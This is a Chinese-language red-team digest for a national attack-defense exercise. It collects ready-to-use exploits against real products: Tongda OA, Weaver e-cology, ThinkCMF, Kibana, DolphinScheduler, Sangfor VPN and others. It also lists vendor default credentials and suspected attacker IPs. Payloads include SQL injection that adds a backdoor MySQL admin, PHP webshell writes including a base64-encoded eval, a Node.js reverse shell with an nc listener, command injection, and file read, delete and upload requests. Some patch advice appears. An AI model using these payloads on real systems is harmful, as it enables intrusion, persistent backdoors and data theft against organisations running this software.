HW平安夜: 09/15 紅隊滲透手冊之彈藥篇

0915HW日報

蹲守機房的第五天，HW過去了三分之一多，機房依舊很冷，但是還好，這次我帶了外套~

但是不敢鬆懈，要提醒自己時刻保持警惕，隨時等候拔線的指令。

今年的HW尤其特別，特別到讓人摸不著頭腦。

·防守方安安靜靜、無報警、無應急、無溯源。互相打探、互相討論：『攻擊隊伍在幹嘛？來了嗎？怎麼還沒來？』

·攻擊方小心翼翼，不用掃描器、不用腳本、重裝電腦、清瀏覽器緩存、訪問下網站判斷是蜜罐立馬就撤離，仿佛人間蒸發一般的招數。

往年防守方不扣分就是贏，今年防守方不抓到人就『如同』輸。

總之今年，一切都是靜悄悄的~

今天很安靜，但是請別大意

今天 ，你拔線了麼？

「滿噹噹的昨天，
富意義的今天～」

今日主題：01 今日收錄、02 情報收集、03 彈藥庫

轉載自：滲了個透

0、通達OA任意用戶登錄

1、首先訪問 /ispirit/login_code.php 獲取 codeuid。

2、訪問 /general/login_code_scan.php 提交 post 參數：

uid=1&codeuid={9E908086-342B-2A87-B0E9-E573E226302A}

3、最後訪問 /ispirit/login_code_check.php?codeuid=xxx

這樣 $_SESSION 裡就有了登錄的信息了。

1、通達OA v11.7 後臺SQL注入

來源:https://mp.weixin.qq.com/s/8rvIT1y_odN2obJ1yAvLbw

利用條件:需要登錄權限,文章作者給出了利用鏈注入加mysql權限,又是寫木馬的。確實用起來很舒服。

/general/hr/manage/query/delete_cascade.php?condition_cascade=

select%20if((substr(user(),1,1)=%27r%27),1,power(9999,99))

1、添加一個mysql用戶

grant all privileges ON mysql.* TO 'ateam666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION

2、給創建的ateam666帳戶添加mysql權限。

UPDATE `mysql`.`user` SET `Password` = '*DE0742FA79F6754E99FDB9C8D2911226A5A9051D', `Select_priv` = 'Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y', `Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` = 'Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y', `References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv` = 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` = 'Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y', `Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y', `Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y', `Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '', `ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0, `max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin` = 'mysql_native_password', `authentication_string` = '', `password_expired` = 'Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('ateam666' AS Binary(5));
3、刷新資料庫就可以登錄到資料庫啦。
/general/hr/manage/query/delete_cascade.php?condition_cascade=flush privileges;
4、通達OA配置mysql默認是不開啟外網訪問的所以需要修改mysql授權登錄。
/general/hr/manage/query/delete_cascade.php?condition_cascade=
grant all privileges ON mysql.* TO 'ateam666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION
5、接下來就是考驗mysql提權功底的時候啦 233...
2、Apache DolphinScheduler權限覆蓋漏洞[CVE-2020-13922]
大概就長這個樣子,默認密碼[HW平安夜: 09/12 態勢感知]有寫到。
POST /dolphinscheduler/users/update
id=1&userName=admin&userPassword=Password1!&tenantId=1&email=sdluser%40sdluser.sdluser&phone=
3、齊治堡壘機遠程代碼執行
據說還是另外一個版本是java的。
POST /shterm/listener/tui_update.php
a=["t';import os;os.popen('whoami')#"]
4、綠盟安全產品默認密碼排查列表
來源:群裡老大哥
IPS入侵防禦系統、SAS­H運維安全管理系統、SAS安全審計系統、DAS資料庫審計系統、RSAS遠程安全評估系統、WAF WEB應用防護系統
sysauditor/sysauditor
sysmanager/sysmanager
supervisor/supervisor
maintainer/maintainer
webpolicy/webpolicy
sysadmin/sysadmin
conadmin/conadmin
supervis/supervis
webaudit/webaudit
sysadmin/sysadmin
conadmin/nsfocus
weboper/weboper
auditor/auditor
weboper/weboper
nsadmin/nsadmin
admin/nsfocus
admin/admin
shell/shell
Weblogic  GIOP 反序列化漏洞（0day），攻擊者通過反序列化可以進行任意代碼執行，請各單位立即排查。
建議關閉Weblogic IIOP 協議，關閉方式如下：
1.打開Weblogic 控制臺。
2.選擇「服務」->」AdminServer」->」協議」，取消「啟用 IIOP」的勾選。
3.重啟 Weblogic 項目，使配置生效。
02 情報收集


回顧一下HW 2020/09/14:
今天也護網行動也慢慢走向高潮了,高級的玩法也已經有人開始玩起來了。
看來明天去上班要帶上一根棍子了,敲幾個無人機下來拿去賣錢哼哼。
漏洞利用工具火爆,不要隨便在微信群內下載使用。2333
【攻擊行為提醒】
近期發現攻擊隊存在利用防守方溯源反制心理，在溯源路徑中，主動留下可訪問的域名，通過防守方訪問行為，獲取防守方信息，進行植入木馬、病毒等操作。請大家在溯源過程中，務必提防該種行為。
可使用手機網絡進行訪問，瀏覽器可開啟無痕模式，避免被獲取到本地保存的身份認證信息。
【HW共享】
真實黑IP：
101.132.173.181
106.75.90.157
119.39.47.95
180.76.172.94
202.83.42.13
223.152.199.149
39.103.142.195
39.98.107.197
47.108.136.49
93.174.91.187
111.180.251.153，經溯源判斷為某釣魚郵件發件IP
redteam IP
181.215.110.137
89.187.182.72
疑似紅隊跳板機，本地監測到這兩個IP存在大量攻擊行為
39.106.95.99
47.108.48.188
123.59.135.171
116.62.179.196
110.43.49.170
漏掃IP：
19.143.32.36
58.18.61.182
60.21.137.162
118.190.218.201
185.239.242.197
104.239.163.85
91.134.235.254
183.146.208.194
113.128.123.214
110.82.64.2
59.58.211.241
122.188.160.133
202.107.226.4
192.241.228.192
192.241.224.186
192.241.220.29
49.73.113.55
113.128.11.207
164.90.145.170
106.121.68.14
39.101.188.125
103.109.100.231
114.239.106.12
49.89.119.103
49.89.249.155
114.239.106.164
49.89.254.29
114.239.107.13
03 彈藥庫
轉載自：水滴安全實驗室
    本篇為紅隊滲透手冊系列的第二篇，剛上車的同學可以先溫習一下第一篇
紅隊滲透手冊之信息收集篇
  
      攻防演練中最必不可少的就是日常exp的積累，在此給大家準備了一些危害大並且在平時的測試中常遇到的一些漏洞知識點，涉及的所有漏洞技能點均為自己復現加收集的公開資料。
Apache shiro 反序列化漏洞
Shiro-550, Shiro-721
漏洞簡介
Apache Shiro是一個強大且易用的Java安全框架,執行身份驗證、授權、密碼和會話管理。
影響範圍
Apache Shiro <= 1.2.4如果shiro的rememberMe功能的AES密鑰被洩露, 就會導致反序列化漏洞，無論Shiro是什麼版本。
漏洞特徵
set-Cookie: rememberMe=deleteMe或者URL中有shiro字樣，有一些時候伺服器不會主動返回 rememberMe=deleteMe直接發包即可
漏洞復現
Shiro RememberMe 1.2.4 反序列化漏洞詳細復現
https://www.cnblogs.com/paperpen/p/11312671.html
Shiro反序列化漏洞利用匯總（Shiro-550+Shiro-721）
https://www.cnblogs.com/xiaozi/p/13239046.html
Shiro RememberMe 1.2.4反序列化導致的命令執行漏洞
https://paper.seebug.org/shiro-rememberme-1-2-4/#0x01
Shiro RememberMe 1.2.4 反序列化漏洞(Shiro-550, CVE-2016-4437)復現
https://blog.csdn.net/qq_43645782/article/details/106028873
Shiro 721 Padding Oracle攻擊漏洞分析
https://www.anquanke.com/post/id/193165
利用工具
ShiroExploit
https://github.com/feihong-cs/ShiroExploit
Shiro_exploit
https://github.com/insightglacier/Shiro_exploit/blob/master/shiro_exploit.py
防護方法
升級Shiro到最新版升級對應JDK版本到 8u191/7u201/6u211/11.0.1 以上WAF攔截Cookie中長度過大的rememberMe值

Apache Shiro 權限繞過漏洞 (Shiro-682)
漏洞簡介
漏洞初始成因可以定位到 PathMatchingFilterChainResolver的getChain函數下，該函數作用根據URL路徑匹配中配置的url路徑表達式來匹配輸入的URL，判斷是否匹配攔截器，匹配成功將會返迴響應的攔截器執行鏈，讓ShiroFither執行權限操作。
影響範圍
Apache Shiro < 1.5.2
漏洞特徵
set-Cookie: rememberMe=deleteMe或者URL中有shiro字樣，有一些時候伺服器不會主動返回 rememberMe=deleteMe 直接發包即可
漏洞復現
Shiro權限繞過漏洞分析（CVE-2020-1957）
https://www.freebuf.com/vuls/231909.html
防護方法
升級1.5.2版本及以上儘量避免使用通配符作為動態路由攔截器的URL路徑表達式.

Weblogic T3 反序列化漏洞
漏洞簡介
Weblogic Server中的RMI 通信使用T3協議在Weblogic Server和其它Java程序（客戶端或者其它Weblogic Server實例）之間傳輸數據, 伺服器實例會跟蹤連接到應用程式的每個Java虛擬機（JVM）中, 並創建T3協議通信連接, 將流量傳輸到Java虛擬機. T3協議在開放WebLogic控制臺埠的應用上默認開啟. 攻擊者可以通過T3協議發送惡意的的反序列化數據, 進行反序列化, 實現對存在漏洞的weblogic組件的遠程代碼執行攻擊.
影響範圍
Weblogic 10.3.6.0.0
Weblogic 12.1.3.0.0
Weblogic 12.2.1.3.0
漏洞特徵
可以根據weblogic的報錯頁面作為特徵：
The server has not found anything matching the Request-URI.No indication is given of whether the condition is temporary or permanent.······
漏洞復現
Weblogic t3反序列化漏洞(CVE-2019-2890)分析
http://gv7.me/articles/2019/cve-2019-2890-vulnerability-analysis/
 Weblogic T3協議反序列化漏洞（CVE-2018-2628）
https://blog.csdn.net/Aaron_Miller/article/details/106657746
相關漏洞包括：
CVE-2017-3248
https://paper.seebug.org/333/
CVE-2018-2628
https://paper.seebug.org/985/
CVE-2018-2893
https://www.freebuf.com/vuls/178105.html
CVE-2019-2890
https://paper.seebug.org/1069/
CVE-2020-2555(Oracle Coherence)
https://paper.seebug.org/1141/
利用工具
weblogic 漏洞掃描工具
https://github.com/0xn0ne/weblogicScanner
防護方法
及時更新補丁禁用T3協議禁止T3埠對外開放, 或者限制可訪問T3埠的IP來源
Weblogic XMLDecoder反序列化
漏洞簡介
WebLogic 中默認包含的 wls-wast 與 wls9_async_response war 包，由於以上 WAR 包採用 XMLDecoder 反序列化機制來處理髮送過來的 XML 數據，遠程惡意攻擊者可以通過發送精心構造的 HTTP 請求，在未授權的情況下遠程執行命令，獲得目標伺服器的權限。也就是說，攻擊者能夠直接獲取伺服器系統權限，進行數據竊取，進而甚至會威脅受害者的內網安全。
影響範圍
Oracle WebLogic Server10.3.6.0.0
 Oracle WebLogic Server12.1.3.0.0
 Oracle WebLogic Server12.2.1.1.0
 Oracle WebLogic Server12.2.1.3.0
漏洞特徵
/wls-wsat/CoordinatorPortType
/async/AsyncResponseService
/async/AsyncResponseServiceSoap12
漏洞復現
WebLogic XMLDecoder反序列化漏洞（CVE-2017-10271）
https://blog.csdn.net/u013622866/article/details/104872747
 WebLogic-XMLDecoder反序列化分析
https://hu3sky.github.io/2019/10/16/weblogic/
利用工具
weblogicScanner
https://github.com/0xn0ne/weblogicScanner
防護方法
通過訪問策略控制禁止外部/_async/* 及 /wls-wsat/*路徑的URL訪問
刪除對應war包並重啟 webLogic
限制源IP對應 weblogic 7001埠的訪問

Fastjson 1.2.22 - 1.2.24 反序列化漏洞
漏洞簡介
FastJson是alibaba的一款開源JSON解析庫，可用於將Java對象轉換為其JSON表示形式，也可以用於將JSON字符串轉換為等效的Java對象。fastjson在解析json的過程中，支持使用autoType來實例化某一個具體的類，並調用該類的set/get方法來訪問屬性。在Java 8u102環境下，沒有com.sun.jndi.rmi.object.trustURLCodebase的限制，可以使用com.sun.rowset.JdbcRowSetImpl的利用鏈，藉助JNDI注入來執行命令。
影響範圍
Fastjson 1.2.22 - 1.2.24
漏洞特徵
如果站點有原始報錯回顯，可以用不閉合花括號的方式進行報錯回顯，報錯中往往會有fastjson的字樣.(vulhub環境不適用）。curl http://10.154.7.128:8090/ -H "Content-Type: application/json" --data '{"name":"success", "age":20'
 可以通過DNS回顯的方式檢測後端是否使用Fastjson。curl http://10.154.7.128:8090/ -H "Content-Type: application/json" --data '{{"@type":"java.net.URL","val":"dnslog"}:0'
 Java 系 Json 處理基本只有 Fastjson 和 Jackson，追加一個隨機 key時jackson會報錯。
 對使用fastjson的。Fastjson < 1.2.60 在取不到值的時候會填充 \u001a ,在1.2.60 進行了修復, 對 \x 後面的字符進行是否為16進位允許字符 (0-9a-fA-F) 的校驗,所以這裡就可以手動 padding ,構造一個特殊的字符串。
漏洞復現
fastjson <= 1.2.24 反序列化漏洞分析
https://www.secpulse.com/archives/73508.html
 fastjson 1.2.24反序列化導致任意命令執行漏洞分析記錄
https://www.cnblogs.com/tr1ple/p/11431543.html
 fastjson 1.2.24反序列化漏洞深度分析
https://www.anquanke.com/post/id/211035
如何利用
https://mntn0x.github.io/2020/04/07/Fastjson%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/
防護方法
直接下載不受影響的新版本阿里官方已經發布公告，建議受影響的用戶立刻升級到1.2.28/1.2.29 或更高的版本，下載地址：http://repo1.maven.org/maven2/com/alibaba/fastjson/1.2.29/

漏洞簡介
Apache Struts2 作為世界上最流行的 Java Web 伺服器框架之一，從出現漏洞至今雖然有些年頭，但是仍然沒有消失。
影響組件
Struts
漏洞復現
Struts2 歷史 RCE 漏洞回顧不完全系列
https://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities/
 淺談struts2歷史上的高危突破
https://www.anquanke.com/post/id/86757
 strut2各版本漏洞信息整理
https://www.zybuluo.com/Dukebf/note/821989
利用工具
HatBoy/Struts2-Scan
https://github.com/HatBoy/Struts2-Scan
Struts2奇葩環境任意文件上傳工具
https://www.cnblogs.com/k8gege/p/10261217.html
防護方法
升級到最新版不建議使用Struts

組件描述
Apache Solr是一個高度可靠、可伸縮和容錯的，提供分布式索引、複製和負載平衡查詢、自動故障轉移和恢復、集中配置等功能的開源的搜索伺服器。Solr為世界上許多最大的網際網路站點提供搜索和導航功能。Solr 使用 Java 語言開發，主要基於 HTTP 和 Apache Lucene 實現。Apache Solr 中存儲的資源是以 Document 為對象進行存儲的。每個文檔由一系列的 Field 構成，每個 Field 表示資源的一個屬性。Solr 中的每個 Document 需要有能唯一標識其自身的屬性，默認情況下這個屬性的名字是 id，在 Schema 配置文件中使用：
<uniqueKey>id</uniqueKey>
影響組件
solr
漏洞復現
Solr系列漏洞復現
https://www.jianshu.com/p/43e7f13e2058
利用工具
k8gege/SolrExp
https://github.com/k8gege/SolrExp
1135/solr_exploit
https://github.com/1135/solr_exploit
防護方法
升級到最新版不要對外開放敏感埠

Tomcat 本地文件包含漏洞 (CVE-2020-1938)
漏洞簡介
Tomcat 是常見的Web 容器, 用戶量非常巨大, Tomcat 8009 ajp埠一直是默認開放的
影響範圍
Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31
漏洞特徵
tomcat/8009/ajp
 \x04\x01\xf4\x00\x15
漏洞復現
CVE-2020-1938 幽靈貓( GhostCat ) Tomcat-Ajp 協議任意文件讀取/JSP文件包含漏洞分析
https://www.guildhab.top/?p=2406
Apache Tomcat文件包含漏洞分析
https://yinwc.github.io/2020/03/01/CVE-2020-1938/
CVE-2020-1938:Tomcat AJP協議文件包含漏洞分析
http://gv7.me/articles/2020/cve-2020-1938-tomcat-ajp-lfi/
檢測工具
bkfish/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner
https://github.com/bkfish/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner
長亭科技檢測工具
https://www.chaitin.cn/zh/ghostcat#download
防護方法
更新為最新版本
若不需要使用Tomcat AJP協議，可直接關閉AJP Connector，或將其監聽地址改為僅監聽本機localhost。

CVE-2020-9484 tomcat session反序列化漏洞分析
漏洞簡介
Apache Tomcat發布通告稱修復了一個源於持久化Session的遠程代碼執行漏洞（CVE-2020-9484）。
漏洞條件比較苛刻：
tomcat必須啟用session持久化功能FileStore
tomcat/lib或者WEB-INF/lib目錄下的依賴存在可用的gadget 3. 在伺服器上存在已知路徑文件內容可控
影響範圍
Apache Tomcat 10.x < 10.0.0-M5
Apache Tomcat 9.x < 9.0.35
Apache Tomcat 8.x < 8.5.55
Apache Tomcat 7.x < 7.0.104
漏洞依賴條件
配置session持久化
conf/context.xml
部署Gadgets jar包
下載commons-collections4-4.0.jar 並放在tomcat lib/目錄下
漏洞復現
CVE-2020-9484 tomcat session反序列化漏洞分析與復現
https://www.cnblogs.com/potatsoSec/p/12931427.html
CVE-2020-9484 tomcat session反序列化漏洞分析與復現
https://blog.csdn.net/Jietewang/article/details/106462903
漏洞利用
tomcat-cluster-session-sync-exp
https://github.com/threedr3am/tomcat-cluster-session-sync-exp
防護方法
Apache Tomcat官方已經發布新版本修復上述漏洞，建議受影響用戶儘快升級進行防護。不方便升級的用戶，還可以暫時禁用FileStore功能，或者單獨配置sessionAttributeValueClassNameFilte的值來確保只有特定屬性的對象可以被序列化/反序列化。

漏洞簡介
部分 Redis 綁定在 0.0.0.0:6379，並且沒有開啟認證（這是 Redis 的默認配置），如果沒有進行採用相關的策略，比如添加防火牆規則避免其他非信任來源 ip 訪問等，將會導致 Redis 服務直接暴露在公網上，導致其他用戶可以直接在非授權情況下直接訪問 Redis 服務並進行相關操作。利用 Redis 自身的提供的 config 命令，可以進行寫文件操作，攻擊者可以成功將自己的公鑰寫入目標伺服器的 /root/.ssh 文件夾的 authotrized_keys 文件中，進而可以直接使用對應的私鑰登錄目標伺服器。
影響組件
Redis
漏洞特徵
6379埠
漏洞復現
Redis 未授權訪問漏洞利用總結
http://www.alloyteam.com/2017/07/12910/
Redis未授權訪問漏洞總結
https://fragrant10.github.io/2019/02/13/Redis%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93.html
復現坑點分析
redis漏洞利用
https://www.jianshu.com/p/2f56a58a1450
redis 4.x/5.x未授權訪問漏洞（以及一些環境搭建的坑）(7月18更新）
http://www.mucn.site/index.php/Termux/210.html
防護方法
redis資料庫漏洞防護
https://www.cnblogs.com/rinack/p/11099854.html
redis未授權訪問漏洞的利用和防護
https://carey.akhack.com/2020/05/07/Redis%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%88%A9%E7%94%A8%E5%92%8C%E9%98%B2%E6%8A%A4/

漏洞簡介
Zabbix組件主要存在注入/弱口令/命令執行等類型的漏洞。
影響組件
Zabbix
漏洞復現：
信息收集 - Zabbix - 漏洞 - 匯總
https://www.cnblogs.com/AtesetEnginner/p/12641747.html
Zabbix（分布式系統監視）漏洞學習
https://www.jianshu.com/p/85e3b0266158
記一次zabbix安裝及漏洞利用getshell全過程
https://xz.aliyun.com/t/6874
Zabbix 最新 SQL 注入漏洞及 EXP – Jamin Zhang
https://jaminzhang.github.io/security/Zabbix-latest-SQL-Injection-Vulnerability-and-EXP/
最新Zabbix漏洞及其利用姿勢（附EXP）
https://zhuanlan.zhihu.com/p/22082375
防護方法
https://www.bbsmax.com/A/QV5ZqlDeJy/

漏洞簡介
Jenkins 是常見的CI/CD伺服器, 最常見的就是爆破弱口令然後使用groovy執行命令
影響組件
Jenkins
漏洞特徵
Jenkins
漏洞復現
Jenkins漏洞集合復現
https://misakikata.github.io/2020/03/Jenkins%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88%E5%A4%8D%E7%8E%B0/
Jenkins任意文件讀取漏洞分析
https://www.freebuf.com/news/178808.html
漏洞利用
blackye/Jenkins: Jenkins漏洞探測、用戶抓取爆破
https://github.com/blackye/Jenkins
gquere/pwn_jenkins: Notes about attacking Jenkins servers
https://github.com/gquere/pwn_jenkins
Jenkins髒牛漏洞FRP內網提權
https://www.freebuf.com/articles/web/215183.html
利用技巧
可以在Jenkins 處進行內網信息收集, 獲取的帳號通常也是開發/運維級別的, 權限相對較大。
防護方法
設置強口令儘量不要開放到公網限制來源IP升級到最新版

Kibana遠程代碼執行漏洞(CVE-2019-7609)
漏洞簡介
Kibana 是為 Elasticsearch設計的開源分析和可視化平臺。你可以使用 Kibana 來搜索，查看存儲在 Elasticsearch 索引中的數據並與之交互。你可以很容易實現高級的數據分析和可視化，以圖標的形式展現出來。
 攻擊者利用漏洞可以通過Timelion組件中的JavaScript原型鏈汙染攻擊，向Kibana發起相關請求，從而接管所在伺服器，在伺服器上執行任意命令。
影響版本
Kibana < 6.6.1
Kibana < 5.6.15
檢測方法
文中給出了POC
https://dylan903.github.io/2019/10/20/kibana-rce-lou-dong-fu-xian/
漏洞復現
CVE-2019-7609 Kibana遠程代碼執行漏洞攻擊方法和漏洞原理分析
https://cloud.tencent.com/developer/article/1535121
CVE-2019-7609 Kibana 代碼執行漏洞復現
http://blog.leanote.com/post/snowming/2cd6256df61d
漏洞利用
jas502n/kibana-RCE
https://github.com/jas502n/kibana-RCE
坑點
部署過程中如果出現 Kibana server is not ready yet,那麼你是需要確定下 你的kibana與elasticsearch版本是否一致
es要用非root用戶啟動，否則會報can not run elasticsearch as root錯誤。
防禦方法
升級Kibana至新版本

Kibana漏洞CVE-2018-17246
漏洞簡介
此漏洞出現在Kibana控制臺（Console）插件中，控制臺插件是KIbana的基本插件，也就是Kibana必裝的插件。當前elastic最新版本為6.5，可以說大部分elk的組件會存在此問題，但是此問題利用難點在於如何創建一個惡意的本地文件。
影響版本
ElasticSearch Kibana < 6.4.3
ElasticSearch Kibana < 5.6.13
利用方法
讀文件操作
http://192.168.1.3:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
反彈shell在kibana的機器創建 /tmp/shell.js
(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(8080, "192.168.1.2", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; })();
請求包含剛剛創建的shell：
http://192.168.1.3:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../tmp/shell.js
本地監聽：
nc -l 8080 -v
漏洞復現
Elasticsearch 核心插件Kibana 本地文件包含漏洞分析（CVE-2018-17246）
https://www.anquanke.com/post/id/168291
ELK LFI CVE-2018-17246
https://wh0ale.github.io/2018/12/18/2018-12-18-ELK%20LFI%20CVE-2018-17246/
坑點
最終漏洞的影響關鍵在於如何創建shell文件。
修復建議
目前廠商已發布升級補丁以修復漏洞，補丁獲取連結:
https://access.redhat.com/security/cve/cve-2018-17246

泛微OA系統多版本存在命令執行漏洞
漏洞簡介
泛微OA辦公系統是一款協調辦公軟體。
泛微協同商務軟體系統存在命令執行漏洞，攻擊者可利用該漏洞獲取伺服器權限。
影響範圍
泛微 e-cology<=9.0
漏洞復現
https://www.cnblogs.com/Sylon/p/11765543.html
Poc
漏洞路徑:/weaver/bsh.servlet.BshServlet
exec("whoami")curl http://xx.xx.xx.xx.xx/weaver/bsh.servlet.BshServlet/ -d 'bsh.script=eval%00("ex"%2b"ec("whoami")");&bsh.servlet.captureOutErr=true&bsh.servlet.outp ut=raw'
批量檢測工具
https://github.com/sunird/e-cology-poc
防護方法
屏蔽/weaver/*目錄的訪問；
https://www.weaver.com.cn/cs/securityDownload.asp

泛微E-cology OA系統SQL注入漏洞
漏洞簡介
泛微e-cology OA系統的WorkflowCenterTreeData接口在使用Oracle資料庫時,由於內置SQL語句拼接不嚴,導致泛微e-cology OA系統存在SQL注入漏洞。攻擊者利用該漏洞，可在未授權的情況下，遠程發送精心構造的SQL語句，從而獲取資料庫敏感信息。
影響範圍
泛微e-cology<=9.0
漏洞復現
泛微生態OA系統SQL注入擴展復現
https://mumuka.gitee.io/passages/%E6%B3%9B%E5%BE%AEe-cology%20OA%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/
 泛微 e-cology OA 前臺SQL注入漏洞復現
https://cloud.tencent.com/developer/article/1521764
簡易poc
POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded
Content-Length: 2236
Connection: close
Upgrade-Insecure-Requests: 1
formids=11111111111)))%0a%0dunion select NULL,value from v$parameter order by (((1
利用工具
AdministratorGithub/e-cology-OA-SQL
https://github.com/AdministratorGithub/e-cology-OA-SQL
 mmioimm/ecology_test
https://github.com/mmioimm/ecology_test
防護方法
及時打補丁
泛微官方安全補丁：https://www.weaver.com.cn/cs/securityDownload.asp

前臺SQL注入:
依賴條件
需要普通用戶權限，默認可註冊
payload：
POST /ThinkCMFX/index.php?g=portal&m=article&a=edit_post HTTP/1.1
Host: localhost
Connection: close
Cookie: PHPSESSID=kcg5v82ms3v13o8pgrhh9saj95
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
       postid=bind&postid=0 and updatexml(1, concat(0x7e,user(),0x7e),1)--+-

前臺模版注入漏洞-可getshell四處
（僅在windows環境下設置）
第一處
http://website/ThinkCMFX/index.php?g=Comment&m=Widget&a=fetch&templateFile=/../public/index&content=<%3fphp+file_put_contents('m.php','<%3fphp+eval($POST[])%3b');?>&prefix=
第二處  http://website/ThinkCMFX/index.php?g=Api&m=Plugin&a=fetch&templateFile=/../../../public/index&content=<%3fphp+file_put_contents('m.php','<%3fphp+eval($POST[])%3b');?>&prefix=
第三處  /index.php?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>
第四處/index.php?a=fetch&content=<?php+file_put_contents("mrxn.php", base64_decode("PD9waHAgZXZhbCgkX1BPU1RbIjAwMCJdKTs/Pg=="));

任意文件刪除-只能windows刪除
在用戶上傳頭像處存在任意文件刪除漏洞，發送如下數據包後，會刪除網站根目錄下一個名為 test.txt 的文件。（該漏洞僅能在 Windows 下觸發）
POST /ThinkCMFX/index.php?g=User&m=Profile&a=do_avatar& HTTP/1.1
Host: localhost
Cookie: PHPSESSID=bggit7phrb1dl99pcb2lagbmq0;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
imgurl=.\test.txt

任意文件上傳
在 ThinkCMFX2.2.3 最終版中，存在一處任意文件上傳（需要普通用戶權限，默認可註冊）
curl -F "file=@/tmp/shell.php" -X "POST" -b 'PHPSESSID=qekmttucmue6vv41kpdjghnkd0;' 'http://127.0.0.1/ThinkCMFX/index.php?g=Asset&m=Ueditor&a=upload&action=uploadfile'

任意文件包含（讀取資料庫配置等等）
/index.php?a=display&templateFile=README.md

漏洞簡介
深信服 VPN 某個特定產品存在遠程代碼執行, 2019 攻防演練使用過
影響組件
深信服 VPN
漏洞指紋
Set-Cookie: TWFID=welcome to ssl vpn Sinfor
Fofa Dork
header="Set-Cookie: TWFID="
漏洞分析
深信服vpnweb登錄逆向學習 – potatso – 博客園
https://www.cnblogs.com/potatsoSec/p/12326356.html
漏洞利用
（簡單的命令注入）
wget -t %d -T %d --spider %s
利用技巧
該版本深信服VPN屬於相對早期的版本, 大概2008年左右, 但目前還有761個ip開放在公網
該版本較低, whomai不存在, 可以使用 uname, 這裡沒有空格可dns傳出來
去除空格也簡單 cat /etc/passwd | tr " \n" "+|"
防護方法
及時更新補丁升級到最新版
ThinkPHP3.2.3_緩存函數設計缺陷可導致Getshell
影響版本
<= 3.2.3
漏洞復現
https://xz.aliyun.com/t/99
https://xz.aliyun.com/t/99
ThinkPHP3.2.3_最新版update注入漏洞
影響版本
<= 3.2.3
漏洞復現
https://www.anquanke.com/post/id/104847
ThinkPHP3.2.X_find_select_delete注入
影響版本
<= 3.2.3
  2.漏洞復現
     https://xz.aliyun.com/t/2631https://xz.aliyun.com/t/2629
ThinkPHP3.X_order_by注入漏洞
影響版本
<= 3.2.3
漏洞復現
https://cloud.tencent.com/developer/news/305625
ThinkPHP5_SQL注入漏洞&&敏感信息洩露
影響版本
< 5.0.9
漏洞復現
https://xz.aliyun.com/t/125> <https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html
ThinkPHP5.0.10-3.2.3_緩存函數設計缺陷可導致Getshell
影響版本
< 5.0.11
漏洞復現
https://xz.aliyun.com/t/99
ThinkPHP框架5.0.X_sql注入漏洞分析
影響版本
< 5.0.16
  2.  漏洞復現
      https://xz.aliyun.com/t/2257
ThinkPHP5.X_order_by注入漏洞
影響版本
<= 5.1.22
漏洞復現
https://www.cnblogs.com/wangtanzhi/p/12741498.html
ThinkPHP5.X_遠程代碼執行
影響版本
5.0.5-5.0.22
5.1.0-5.1.30
漏洞復現
https://xz.aliyun.com/t/3570https://paper.seebug.org/760https://paper.seebug.org/770

通達OA任意用戶登錄漏洞
1.漏洞簡介
通達OA採用基於WEB的企業計算，主HTTP伺服器採用了世界上最先進的Apache伺服器，性能穩定可靠。數據存取集中控制，避免了數據洩漏的可能。提供數據備份工具，保護系統數據安全。多級的權限控制，完善的密碼驗證與登錄驗證機制更加強了系統安全性。
2.影響範圍
通達OA2017
通達OA V11.x<V11.5
3.漏洞指紋
/static/templates/2017_01/userName.png
Office Anywhere 20xx版 網絡智能辦公系統
/ispirit/interface/gateway.php
4.漏洞利用工具
https://github.com/NS-Sp4ce/TongDaOA-Fake-User
https://github.com/zrools/tools/blob/master/python/tongda_v11.4_rce_exp.py
